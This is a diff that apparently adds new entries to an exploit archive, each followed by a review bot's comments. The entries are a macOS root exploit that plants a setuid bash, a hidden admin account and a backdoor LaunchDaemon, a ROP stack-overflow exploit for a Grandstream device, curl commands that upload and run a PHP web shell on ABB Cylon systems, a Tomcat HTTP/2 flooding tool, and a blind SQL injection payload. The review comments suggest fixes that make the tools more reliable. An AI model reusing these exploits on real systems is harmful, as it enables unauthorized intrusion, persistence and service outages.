@@ -0,0 +1,100 @@ +#!/usr/bin/env python3 +# Exploit Title: macOS LaunchDaemon iOS 17.2 - Privilege Escalation +# Author: Mohammed Idrees Banyamer (@banyamer_security) +# GitHub: https://github.com/mbanyamer +# Date: 2025-05-31 +# Tested on: macOS Sonoma (14.x ARM64 / x86_64) +# CVE: CVE-2025-24085 +# Type: Local Privilege Escalation +# Platform: macOS +# Author Country: Jordan +# Description: +# This local privilege escalation exploit leverages a vulnerable macOS LaunchDaemon plist configuration to execute +# arbitrary commands with root privileges. The exploit creates a root payload script that adds a root shell binary, +# creates an admin user, and installs a persistent LaunchDaemon backdoor for root access. It hijacks the +# com.apple.securemonitor LaunchDaemon plist to trigger the payload, allowing unauthorized escalation to root +# on macOS Sonoma systems. + +import os +import plistlib +import time +from pathlib import Path + +LAUNCHD_PLIST = "/Library/LaunchDaemons/com.apple.securemonitor.plist" +PAYLOAD_SCRIPT = "/tmp/.macroot_payload.sh" + +def create_payload(): + print("[+] Creating root payload script...") + payload = """#!/bin/bash +# Root shell +cp /bin/bash /tmp/.rootbash +chmod +s /tmp/.rootbash +chown root:wheel /tmp/.rootbash + +# Add admin user +sysadminctl -addUser pentest -password macOS123! 
-admin + +# Log file +echo "[+] Root backdoor triggered at $(date)" >> /tmp/.rootlog + +# Persistent backdoor +cat < /Library/LaunchDaemons/com.apple.backdoor.plist + + + + + Labelcom.apple.backdoor + ProgramArguments/tmp/.rootbash + RunAtLoad + + +EOF +chmod 644 /Library/LaunchDaemons/com.apple.backdoor.plist +chown root:wheel /Library/LaunchDaemons/com.apple.backdoor.plist +""" + with open(PAYLOAD_SCRIPT, "w") as f: + f.write(payload) + os.chmod(PAYLOAD_SCRIPT, 0o755) + +def hijack_launchdaemon(): + print("[+] Hijacking LaunchDaemon plist...") + if not Path(LAUNCHD_PLIST).exists(): + # create a fake one + print("[*] Creating fake LaunchDaemon plist for exploitation...") + plist_data = { + 'Label': 'com.apple.securemonitor', + 'ProgramArguments': [PAYLOAD_SCRIPT], + 'RunAtLoad': True, + } + with open(LAUNCHD_PLIST, "wb") as f: + plistlib.dump(plist_data, f) + else: + # hijack existing one + with open(LAUNCHD_PLIST, 'rb') as f: + plist = plistlib.load(f) + plist['ProgramArguments'] = [PAYLOAD_SCRIPT] + plist['RunAtLoad'] = True + with open(LAUNCHD_PLIST, 'wb') as f: + plistlib.dump(plist, f) + + os.system(f"chmod 644 {LAUNCHD_PLIST}") + os.system(f"chown root:wheel {LAUNCHD_PLIST}") + +def trigger_payload(): + print("[+] Triggering LaunchDaemon manually...") + os.system(f"sudo launchctl load -w {LAUNCHD_PLIST}") + print("[+] Done. You can now execute /tmp/.rootbash -p for root shell") + +def main(): + if os.geteuid() == 0: + print("[!] You are already root. No need to exploit.") + return + create_payload() + hijack_launchdaemon() + print("[+] Exploit completed. Reboot or run manually:") + print(f" sudo launchctl load -w {LAUNCHD_PLIST}") + print(" Then run: /tmp/.rootbash -p") + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/exploits/multiple/remote/52313.py b/exploits/multiple/remote/52313.py new file mode 100755 index 000000000..ca43d91cd --- /dev/null +++ b/exploits/multiple/remote/52313.py 
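Review bot: main() exits when euid is 0, yet both branches of hijack_launchdaemon() open /Library/LaunchDaemons/com.apple.securemonitor.plist for writing and the chmod/chown calls target the same path, which is root-owned on a stock install, so for the unprivileged user the script is written for the open() raises an unhandled PermissionError before any of the described escalation happens; nothing in the hunk shows how CVE-2025-24085 would let a non-root user write there, so as committed the PoC does not demonstrate the privilege boundary it names. trigger_payload() is defined but never called, and `import time` is unused. At minimum the write should be guarded, e.g. `except PermissionError: raise SystemExit("[-] cannot write LaunchDaemon plist: precondition for the claimed escalation is not met")`, and the header should say what the actual write primitive is. The artefacts a defender would alert on are already named in the file: a LaunchDaemon whose ProgramArguments points into /tmp, and a setuid-bit copy of bash under /tmp.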
@@ -0,0 +1,110 @@ +#!/usr/bin/env python3 + +# Exploit Title: Grandstream GSD3710 1.0.11.13 - Stack Overflow +# Date: 2025-05-29 +# Exploit Author: Pepelux +# Vendor Homepage: https://www.grandstream.com/ +# Version: Grandstream GSD3710 - firmware:1.0.11.13 and lower +# Tested on: Linux and MacOS +# CVE: CVE-2022-2025 + +""" +Author: Jose Luis Verdeguer (@pepeluxx) + +Required: Pwntools + +Example: + +$ python 3 CVE-2022-2025.py -i DEVICE_IP -u USER -p PASSWORD +""" + + +from struct import pack +import sys +from time import sleep +import argparse +from pwn import * + + +def get_args(): + parser = argparse.ArgumentParser( + formatter_class=lambda prog: argparse.RawDescriptionHelpFormatter( + prog, max_help_position=50)) + + # Add arguments + parser.add_argument('-i', '--ip', type=str, required=True, + help='device IP address', dest="ip") + parser.add_argument('-u', '--user', type=str, required=True, + help='username', dest="user") + parser.add_argument('-p', '--pass', type=str, required=True, + help='password', dest="pwd") + + # Array for all arguments passed to script + args = parser.parse_args() + + try: + ip = args.ip + user = args.user + pwd = args.pwd + + return ip, user, pwd + except ValueError: + exit() + +def check_badchars(payload): + for i in range(5, len(payload)): + if payload[i] in [0xd, 0xa, 0x3b, 0x7c, 0x20]: + log.warn("Badchar %s detected at %#x" % (hex(payload[i]), i)) + return True + return False + + +def main(): + ip, user, pwd = get_args() + + libc_base = 0x76bb8000 + gadget = libc_base + 0x5952C # 0x0005952c: pop {r0, r4, pc}; + bin_sh = libc_base + 0xCEA9C # /bin/sh + system = libc_base + 0x2C7FD # 0x0002c7fd # system@libc + exit = libc_base + 0x2660C + + print("[*] Libc base: %#x" % libc_base) + print("[*] ROP gadget: %#x" % gadget) + print("[*] /bin/sh: %#x" % bin_sh) + print("[*] system: %#x" % system) + print("[*] exit: %#x\n" % exit) + + padding = b"A" * 320 + + payload = b'ping ' + payload += padding + payload += p32(gadget) + payload += 
p32(bin_sh) + payload += b"AAAA" + payload += p32(system) + payload += p32(exit) + + if check_badchars(payload): + sys.exit(0) + + count = 1 + + while True: + print('Try: %d' % count) + s = ssh(user, ip, 22, pwd) + p = s.shell(tty=False) + print(p.readuntil(b"GDS3710> ")) + p.sendline(payload) + p.sendline(b"id") + sleep(1) + data = p.read() + if str(data).find('root') > -1: + print('PWNED!') + p.interactive() + s.close() + sys.exit() + s.close() + count += 1 + +if __name__ == '__main__': + main() \ No newline at end of file diff --git a/exploits/multiple/remote/52317.txt b/exploits/multiple/remote/52317.txt new file mode 100644 index 000000000..2bad6e819 --- /dev/null +++ b/exploits/multiple/remote/52317.txt 
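Review bot: The retry loop at the end of main() is `while True` with no cap, so against a device that is patched, or whose libc is not at the hard-coded 0x76bb8000, the script opens and closes SSH sessions indefinitely while printing 'Try: N', and the only way out is an exception or a keyboard interrupt; a bound such as `if count > max_tries: sys.exit('[-] giving up')` before `s = ssh(...)` would make failure observable. get_args() wraps three plain attribute reads in `except ValueError: exit()`, which cannot fire because argparse exits on bad input itself, so that try block is dead code. main() also binds the local name `exit` to the libc address, shadowing the builtin inside that function; `exit_addr` would read better. The libc offsets are firmware-specific constants and deserve a one-line comment naming the image they were taken from, since the header says 1.0.11.13 'and lower' but only one layout is encoded.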
@@ -0,0 +1,97 @@ +ABB Cylon Aspect 3.08.04 DeploySource - Remote Code Execution (RCE) + + +Vendor: ABB Ltd. +Product web page: https://www.global.abb +Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio + Firmware: <=3.08.04 + +Summary: ASPECT is an award-winning scalable building energy management +and control solution designed to allow users seamless access to their +building data through standard building protocols including smart devices. + +Desc: ABB Cylon Aspect BMS/BAS is vulnerable to a critical flaw in the +AuthenticatedHttpServlet within its application server, enabling +remote attackers to bypass authentication by setting the Host: +127.0.0.1 header. This deceives the server into processing requests +as if they originate from localhost, granting unauthorized access +to privileged operations. This bypass grants access to privileged +functionality, including the DeploymentServlet, which is vulnerable +to directory traversal. By leveraging this, an attacker can write +arbitrary PHP files outside the intended directory scope. When combined, +these issues allow remote attackers to upload a malicious PHP shell +and execute system commands with the privileges of the web server, +leading to full system compromise. 
+ +Tested on: GNU/Linux 3.15.10 (armv7l) + GNU/Linux 3.10.0 (x86_64) + GNU/Linux 2.6.32 (x86_64) + Intel(R) Atom(TM) Processor E3930 @ 1.30GHz + Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz + PHP/7.3.11 + PHP/5.6.30 + PHP/5.4.16 + PHP/4.4.8 + PHP/5.3.3 + AspectFT Automation Application Server + lighttpd/1.4.32 + lighttpd/1.4.18 + Apache/2.2.15 (CentOS) + OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64) + OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode) + ErgoTech MIX Deployment Server 2.0.0 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2025-5954 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5954.php + + +21.04.2024 + +-- + + +$ cat project + + P R O J E C T + + .| + | | + |'| ._____ + ___ | | |. |' .---"| + _ .-' '-. | | .--'| || | _| | + .-'| _.| | || '-__ | | | || | + |' | |. | || | | | | || | + ____| '-' ' "" '-' '-.' '` |____ +░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░ + ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░ + + +$ curl "http://192.168.73.31:7226/servlets/DeploymentServlet\ +> ?RequestType=DeploySource\ +> &filename=../../../home/MIX_CMIX/htmlroot/zsl.php\ +> &directory=/" \ +> --data-binary @zsl.php \ +> -H "Host: 127.0.0.1" \ +> -H "Content-Type: application/octet-stream" +200 Successful200 Successful + +$ curl http://192.168.73.31/zsl.php?cmd=id;ls -al 
zsl.php +uid=48(apache) gid=48(apache) groups=48(apache),0(root) context=system_u:system_r:httpd_t:s0 +-rw-r--r--. 1 root root 106 Jun 4 13:29 zsl.php \ No newline at end of file diff --git a/exploits/multiple/remote/52318.py b/exploits/multiple/remote/52318.py new file mode 100755 index 000000000..8d14e4a5f --- /dev/null +++ b/exploits/multiple/remote/52318.py 
@@ -0,0 +1,143 @@ +# Exploit Title: Apache Tomcat 10.1.39 - Denial of Service (DOS) +# Author: Abdualhadi khalifa +# CVE: CVE-2025-31650 + +import httpx +import asyncio +import random +import urllib.parse +import sys +import socket +from colorama import init, Fore, Style + +init() + +class TomcatKiller: + def __init__(self): + self.success_count = 0 + self.error_count = 0 + self.invalid_priorities = [ + \\\"u=-1, q=2\\\", + \\\"u=4294967295, q=-1\\\", + \\\"u=-2147483648, q=1.5\\\", + \\\"u=0, q=invalid\\\", + \\\"u=1/0, q=NaN\\\", + \\\"u=1, q=2, invalid=param\\\", + \\\"\\\", + \\\"u=1, q=1, u=2\\\", + \\\"u=99999999999999999999, q=0\\\", + \\\"u=-99999999999999999999, q=0\\\", + \\\"u=, q=\\\", + \\\"u=1, q=1, malformed\\\", + \\\"u=1, q=, invalid\\\", + \\\"u=-1, q=4294967295\\\", + \\\"u=invalid, q=1\\\", + \\\"u=1, q=1, extra=\\\", + \\\"u=1, q=1; malformed\\\", + \\\"u=1, q=1, =invalid\\\", + \\\"u=0, q=0, stream=invalid\\\", + \\\"u=1, q=1, priority=recursive\\\", + \\\"u=1, q=1, %invalid%\\\", + \\\"u=0, q=0, null=0\\\", + ] + + async def validate_url(self, url): + try: + parsed_url = urllib.parse.urlparse(url) + if not parsed_url.scheme or not parsed_url.hostname: + raise ValueError(\\\"Invalid URL format. Use http:// or https://\\\") + host = parsed_url.hostname + port = parsed_url.port if parsed_url.port else (443 if parsed_url.scheme == \\\'https\\\' else 80) + return host, port + except Exception: + print(f\\\"{Fore.RED}Error: Invalid URL. Use http:// or https:// format.{Style.RESET_ALL}\\\") + sys.exit(1) + + async def check_http2_support(self, host, port): + async with httpx.AsyncClient(http2=True, verify=False, timeout=5, limits=httpx.Limits(max_connections=1000)) as client: + try: + response = await client.get(f\\\"https://{host}:{port}/\\\", headers={\\\"user-agent\\\": \\\"TomcatKiller\\\"}) + if response.http_version == \\\"HTTP/2\\\": + print(f\\\"{Fore.GREEN}HTTP/2 supported! 
Proceeding ...{Style.RESET_ALL}\\\") + return True + else: + print(f\\\"{Fore.YELLOW}Error: HTTP/2 not supported. This exploit requires HTTP/2.{Style.RESET_ALL}\\\") + return False + except Exception: + print(f\\\"{Fore.RED}Error: Could not connect to {host}:{port}.{Style.RESET_ALL}\\\") + return False + + async def send_invalid_priority_request(self, host, port, num_requests, task_id): + async with httpx.AsyncClient(http2=True, verify=False, timeout=0.3, limits=httpx.Limits(max_connections=1000)) as client: + url = f\\\"https://{host}:{port}/\\\" + for i in range(num_requests): + headers = { + \\\"priority\\\": random.choice(self.invalid_priorities), + \\\"user-agent\\\": f\\\"TomcatKiller-{task_id}-{random.randint(1, 1000000)}\\\", + \\\"cache-control\\\": \\\"no-cache\\\", + \\\"accept\\\": f\\\"*/*; q={random.random()}\\\", + } + try: + await client.get(url, headers=headers) + self.success_count += 1 + except Exception: + self.error_count += 1 + + async def monitor_server(self, host, port): + while True: + try: + with socket.create_connection((host, port), timeout=2): + print(f\\\"{Fore.YELLOW}Target {host}:{port} is reachable.{Style.RESET_ALL}\\\") + except Exception: + print(f\\\"{Fore.RED}Target {host}:{port} unreachable or crashed!{Style.RESET_ALL}\\\") + break + await asyncio.sleep(2) + + async def run_attack(self, host, port, num_tasks, requests_per_task): + print(f\\\"{Fore.GREEN}Starting attack on {host}:{port}...{Style.RESET_ALL}\\\") + print(f\\\"Tasks: {num_tasks}, Requests per task: {requests_per_task}\\\") + print(f\\\"{Fore.YELLOW}Monitor memory manually via VisualVM or check catalina.out for OutOfMemoryError.{Style.RESET_ALL}\\\") + + monitor_task = asyncio.create_task(self.monitor_server(host, port)) + tasks = [self.send_invalid_priority_request(host, port, requests_per_task, i) for i in range(num_tasks)] + await asyncio.gather(*tasks) + monitor_task.cancel() + + total_requests = num_tasks * requests_per_task + success_rate = (self.success_count 
/ total_requests * 100) if total_requests > 0 else 0 + print(f\\\"\\\\n{Fore.MAGENTA}===== Attack Summary ====={Style.RESET_ALL}\\\") + print(f\\\"Target: {host}:{port}\\\") + print(f\\\"Total Requests: {total_requests}\\\") + print(f\\\"Successful Requests: {self.success_count}\\\") + print(f\\\"Failed Requests: {self.error_count}\\\") + print(f\\\"Success Rate: {success_rate:.2f}%\\\") + print(f\\\"{Fore.MAGENTA}========================={Style.RESET_ALL}\\\") + +async def main(): + print(f\\\"{Fore.BLUE}===== TomcatKiller - CVE-2025-31650 ====={Style.RESET_ALL}\\\") + print(f\\\"Developed by: @absholi7ly\\\") + print(f\\\"Exploits memory leak in Apache Tomcat (10.1.10-10.1.39) via invalid HTTP/2 priority headers.\\\") + print(f\\\"{Fore.YELLOW}Warning: For authorized testing only. Ensure HTTP/2 and vulnerable Tomcat version.{Style.RESET_ALL}\\\\n\\\") + + url = input(f\\\"{Fore.CYAN}Enter target URL (e.g., https://localhost:8443): {Style.RESET_ALL}\\\") + num_tasks = int(input(f\\\"{Fore.CYAN}Enter number of tasks (default 300): {Style.RESET_ALL}\\\") or 300) + requests_per_task = int(input(f\\\"{Fore.CYAN}Enter requests per task (default 100000): {Style.RESET_ALL}\\\") or 100000) + + tk = TomcatKiller() + host, port = await tk.validate_url(url) + + if not await tk.check_http2_support(host, port): + sys.exit(1) + + await tk.run_attack(host, port, num_tasks, requests_per_task) + +if __name__ == \\\"__main__\\\": + try: + asyncio.run(main()) + print(f\\\"{Fore.GREEN}Attack completed!{Style.RESET_ALL}\\\") + except KeyboardInterrupt: + print(f\\\"{Fore.YELLOW}Attack interrupted by user.{Style.RESET_ALL}\\\") + sys.exit(0) + except Exception as e: + print(f\\\"{Fore.RED}Unexpected error: {e}{Style.RESET_ALL}\\\") + sys.exit(1) \ No newline at end of file diff --git a/exploits/php/webapps/52314.txt b/exploits/php/webapps/52314.txt new file mode 100644 index 000000000..781699860 --- /dev/null +++ b/exploits/php/webapps/52314.txt 
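Review bot: validate_url() accepts an http:// scheme and derives port 80 from it, but check_http2_support() and send_invalid_priority_request() both build `https://{host}:{port}/`, so a target given with http:// is probed on the wrong scheme and reported as 'Could not connect' instead of the real reason; return `parsed_url.scheme` from validate_url() and use it when building the URL, or reject http:// up front. monitor_server() calls the blocking `socket.create_connection(..., timeout=2)` from inside a coroutine, which stalls the event loop for up to the timeout on every probe, so the reachability messages are not independent of the request tasks they are meant to observe; `asyncio.open_connection` under `asyncio.wait_for` is the non-blocking form. The file header should also carry the affected range and precondition that only appear in main()'s banner — Tomcat 10.1.10 through 10.1.39 with HTTP/2 enabled on the connector — since that, not the script, is what a defender needs to triage CVE-2025-31650 against an inventory.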
@@ -0,0 +1,22 @@ +# Exploit Title: CloudClassroom PHP Project 1.0 - SQL Injection +# Google Dork: inurl:CloudClassroom-PHP-Project-master +# Date: 2025-05-30 +# Exploit Author: Sanjay Singh +# Vendor Homepage: https://github.com/mathurvishal/CloudClassroom-PHP-Project +# Software Link: https://github.com/mathurvishal/CloudClassroom-PHP-Project/archive/refs/heads/master.zip +# Version: 1.0 +# Tested on: XAMPP on Windows 10 / Ubuntu 22.04 +# CVE : CVE-2025-45542 + +# Description: +# A time-based blind SQL injection vulnerability exists in the pass parameter +# of the registrationform endpoint. An attacker can exploit this issue by sending +# a malicious POST request to delay server response and infer data. + +# PoC Request (simulated using curl): + +curl -X POST http://localhost/CloudClassroom-PHP-Project-master/registrationform \ + -H "Content-Type: application/x-www-form-urlencoded" \ + -d "addrs=3137%20Laguna%20Street&course=1&dob=1967/1/1&email=testing@example.com&faname=test&fname=test&gender=Female&lname=test&pass=u]H[ww6KrA9F.x-F0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z&phno=94102&sub=" + +# The server response will be delayed if the SQL condition is true, confirming the injection point. \ No newline at end of file diff --git a/exploits/windows/remote/52315.py b/exploits/windows/remote/52315.py new file mode 100755 index 000000000..b3d913f11 --- /dev/null +++ b/exploits/windows/remote/52315.py 
@@ -0,0 +1,108 @@ +#!/usr/bin/env python3 +# Exploit Title: Microsoft Windows Server 2025 JScript Engine - Remote Code Execution (RCE) +# Exploit Author: Mohammed Idrees Banyamer +# Instagram: @@banyamer_security +# GitHub: https://github.com/mbanyamer +# Date: 2025-05-31 +# CVE: CVE-2025-30397 +# Vendor: Microsoft +# Affected Versions: Windows Server 2025 (build 25398 and prior) +# Tested on: Windows Server 2025 + IE11 (x86) +# Type: Remote +# Platform: Windows +# Vulnerability Type: Use-After-Free (JScript Engine) +# Description: This PoC exploits a Use-After-Free vulnerability in jscript.dll to achieve code execution via heap spraying. The shellcode executes calc.exe as a demonstration of code execution. + +# ============================ +# Usage Instructions: +# +# 1. Save this script as `exploit_server.py`. +# 2. Run it with Python 3: +# $ python3 exploit_server.py +# 3. On the vulnerable target (Windows Server 2025 + IE11): +# Open Internet Explorer and navigate to: +# http://:8080/poc_cve_2025_30397.html +# +# If the target is vulnerable, calc.exe will be executed. +# ============================ + +import http.server +import socketserver + +PORT = 8080 + +HTML_CONTENT = b""" + + + + PoC - CVE-2025-30397 + + + +

Exploit PoC: CVE-2025-30397

+

Author: Mohammed Idrees Banyamer

+

Instagram: @banyamer_security

+

GitHub: mbanyamer

+

This demonstration is for ethical testing only. Triggering the vulnerability on vulnerable Internet Explorer installations will lead to execution of calc.exe via shellcode.

+ + +""" + +class Handler(http.server.SimpleHTTPRequestHandler): + def do_GET(self): + if self.path == '/' or self.path == '/poc_cve_2025_30397.html': + self.send_response(200) + self.send_header("Content-type", "text/html") + self.send_header("Content-length", str(len(HTML_CONTENT))) + self.send_header("X-Content-Type-Options", "nosniff") + self.send_header("X-Frame-Options", "SAMEORIGIN") + self.send_header("Content-Security-Policy", "default-src 'self'") + self.send_header("Cache-Control", "no-cache, no-store, must-revalidate") + self.send_header("Pragma", "no-cache") + self.send_header("Expires", "0") + self.end_headers() + self.wfile.write(HTML_CONTENT) + else: + self.send_error(404, "File Not Found") + +def run(): + print(f"Serving PoC on http://0.0.0.0:{PORT}/poc_cve_2025_30397.html") + with socketserver.TCPServer(("", PORT), Handler) as httpd: + try: + httpd.serve_forever() + except KeyboardInterrupt: + print("\nServer stopped.") + +if __name__ == "__main__": + run() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index aea095c41..efa451980 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
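Review bot: HTML_CONTENT as it appears in this hunk carries no script: between the 'PoC - CVE-2025-30397' title and the closing triple quote there are only headings and paragraphs, while the header comment promises a jscript.dll use-after-free trigger, heap spray and calc.exe shellcode; unless a script element was lost in extraction, the file serves a static page that cannot exercise the CVE and the description is unsupported. The handler also sends `Content-Security-Policy: default-src 'self'`, which forbids inline script in any CSP-enforcing client, so a page that did rely on an inline trigger would be defeated by its own headers. Handler subclasses SimpleHTTPRequestHandler but replaces do_GET entirely, so `http.server.BaseHTTPRequestHandler` is the accurate base and avoids inheriting a file-serving fallback that is never used. The header should state what the script actually serves; binding to `("", PORT)` also exposes the page on every interface, and a loopback bind is the safer default for a demonstration page.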
@@ -9268,6 +9268,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 47708,exploits/macos/local/47708.txt,"macOS 10.14.6 - root->kernel Privilege Escalation via update_dyld_shared_cache",2019-11-22,"Google Security Research",local,macos,,2019-11-22,2019-11-22,1,,,,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=1929
 47400,exploits/macos/local/47400.md,"macOS 18.7.0 Kernel - Local Privilege Escalation",2019-09-19,A2nkF,local,macos,,2019-09-19,2019-09-19,0,,,,,,https://github.com/A2nkF/macOS-Kernel-Exploit/tree/81765a91cd299b6c05fd3edf7afe557405c949fa
 48464,exploits/macos/local/48464.py,"MacOS 320.whatis Script - Privilege Escalation",2020-05-12,"Csaba Fitzl",local,macos,,2020-05-12,2020-05-12,0,,,,,,
+52316,exploits/macos/local/52316.py,"macOS LaunchDaemon iOS 17.2 - Privilege Escalation",2025-06-05,"Mohammed Idrees Banyamer",local,macos,,2025-06-05,2025-06-05,0,CVE-2025-24085,,,,,
 43217,exploits/macos/local/43217.sh,"Murus 1.4.11 - Local Privilege Escalation",2017-12-06,"Mark Wadham",local,macos,,2017-12-06,2017-12-06,0,,Local,,,http://www.exploit-db.commurus-1.4.11.zip,https://m4.rkw.io/blog/murus-firewall-1411-escalation-hihack--root-privesc.html
 41854,exploits/macos/local/41854.txt,"Proxifier for Mac 2.17/2.18 - Privesc Escalation",2017-04-11,"Mark Wadham",local,macos,,2017-04-11,2017-04-12,0,CVE-2017-7643,Local,,,,https://m4.rkw.io/blog/cve20177643-local-root-privesc-in-proxifier-for-mac--218.html
 41853,exploits/macos/local/41853.txt,"Proxifier for Mac 2.18 - Multiple Vulnerabilities",2017-04-11,Securify,local,macos,,2017-04-11,2017-04-11,0,,,,,,https://www.securify.nl/advisory/SFY20170401/multiple_local_privilege_escalation_vulnerabilities_in_proxifier_for_mac.html
@@ -10622,6 +10623,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 31921,exploits/multiple/remote/31921.txt,"3D-FTP 8.01 - 'LIST' / 'MLSD' Directory Traversal",2008-06-16,"Tan Chew Keong",remote,multiple,,2008-06-16,2014-02-26,1,CVE-2008-2822;OSVDB-46155,,,,,https://www.securityfocus.com/bid/29749/info
 32167,exploits/multiple/remote/32167.txt,"8E6 Technologies R3000 - Host Header Internet Filter Security Bypass",2008-08-05,nnposter,remote,multiple,,2008-08-05,2014-03-11,1,CVE-2008-3494;OSVDB-47517,,,,,https://www.securityfocus.com/bid/30541/info
 52305,exploits/multiple/remote/52305.py,"ABB Cylon Aspect 3.08.03 - Guest2Root Privilege Escalation",2025-05-25,LiquidWorm,remote,multiple,,2025-05-25,2025-05-25,0,CVE-n/a,,,,,
+52317,exploits/multiple/remote/52317.txt,"ABB Cylon Aspect 3.08.04 DeploySource - Remote Code Execution (RCE)",2025-06-05,LiquidWorm,remote,multiple,,2025-06-05,2025-06-05,0,CVE-n/a,,,,,
 25019,exploits/multiple/remote/25019.txt,"ABC2MIDI 2004-12-04 - Multiple Stack Buffer Overflow Vulnerabilities",2004-12-15,"Limin Wang",remote,multiple,,2004-12-15,2013-04-30,1,CVE-2004-1256;OSVDB-12426,,,,,https://www.securityfocus.com/bid/12019/info
 25018,exploits/multiple/remote/25018.txt,"ABC2MTEX 1.6.1 - Process ABC Key Field Buffer Overflow",2004-12-15,"Limin Wang",remote,multiple,,2004-12-15,2013-04-30,1,,,,,,https://www.securityfocus.com/bid/12018/info
 32382,exploits/multiple/remote/32382.txt,"Accellion File Transfer Appliance Error Report Message - Open Email Relay",2008-09-15,"Eric Beaulieu",remote,multiple,,2008-09-15,2014-03-20,1,CVE-2008-7012;OSVDB-48242,,,,,https://www.securityfocus.com/bid/31178/info
@@ -10742,6 +10744,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 9994,exploits/multiple/remote/9994.txt,"Apache Tomcat - Cookie Quote Handling Remote Information Disclosure",2009-11-09,"John Kew",remote,multiple,,2009-11-08,,1,,,,,,
 9995,exploits/multiple/remote/9995.txt,"Apache Tomcat - Form Authentication 'Username' Enumeration",2009-11-09,"D. Matscheko",remote,multiple,,2009-11-08,,1,,,,,,
 27095,exploits/multiple/remote/27095.txt,"Apache Tomcat / Geronimo 1.0 - 'Sample Script cal2.jsp?time' Cross-Site Scripting",2006-01-16,"Oliver Karow",remote,multiple,,2006-01-16,2013-07-25,1,CVE-2006-0254;OSVDB-22458,,,,,https://www.securityfocus.com/bid/16260/info
+52318,exploits/multiple/remote/52318.py,"Apache Tomcat 10.1.39 - Denial of Service (DoS)",2025-06-05,"Abdualhadi khalifa",remote,multiple,,2025-06-05,2025-06-05,0,CVE-2025-31650,,,,,
 20131,exploits/multiple/remote/20131.txt,"Apache Tomcat 3.1 - Path Revealing",2000-07-20,"ET LoWNOISE",remote,multiple,,2000-07-20,2012-07-31,1,CVE-2000-0759;OSVDB-674,,,,,https://www.securityfocus.com/bid/1531/info
 33379,exploits/multiple/remote/33379.txt,"Apache Tomcat 3.2 - 404 Error Page Cross-Site Scripting",2009-09-02,MustLive,remote,multiple,,2009-09-02,2014-05-16,1,,,,,,https://www.securityfocus.com/bid/37149/info
 21492,exploits/multiple/remote/21492.txt,"Apache Tomcat 3.2.3/3.2.4 - 'RealPath.jsp' Information Disclosuree",2002-05-29,"Richard Brain",remote,multiple,,2002-05-29,2017-07-11,1,CVE-2002-2007;OSVDB-13304,,,,,https://www.securityfocus.com/bid/4878/info
@@ -11000,6 +11003,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 39292,exploits/multiple/remote/39292.pl,"Granding MA300 - Traffic Sniffing Man In The Middle Fingerprint PIN Disclosure",2014-08-26,"Eric Sesterhenn",remote,multiple,,2014-08-26,2018-01-11,1,CVE-2014-5380;OSVDB-110460,,,,,https://www.securityfocus.com/bid/69390/info
 39293,exploits/multiple/remote/39293.pl,"Granding MA300 - Weak Pin Encryption Brute Force",2014-08-26,"Eric Sesterhenn",remote,multiple,,2014-08-26,2016-01-22,1,CVE-2014-5381;OSVDB-110456,,,,,https://www.securityfocus.com/bid/69390/info
 52303,exploits/multiple/remote/52303.py,"Grandstream GSD3710 1.0.11.13 - Stack Buffer Overflow",2025-05-25,Pepelux,remote,multiple,,2025-05-25,2025-05-25,0,CVE-2022-2070,,,,,
+52313,exploits/multiple/remote/52313.py,"Grandstream GSD3710 1.0.11.13 - Stack Overflow",2025-06-05,Pepelux,remote,multiple,,2025-06-05,2025-06-05,0,CVE-2022-2025,,,,,
 33203,exploits/multiple/remote/33203.txt,"GreenSQL Firewall 0.9.x - WHERE Clause Security Bypass",2009-09-02,"Johannes Dahse",remote,multiple,,2009-09-02,2014-05-06,1,CVE-2008-6992;OSVDB-48910,,,,,https://www.securityfocus.com/bid/36209/info
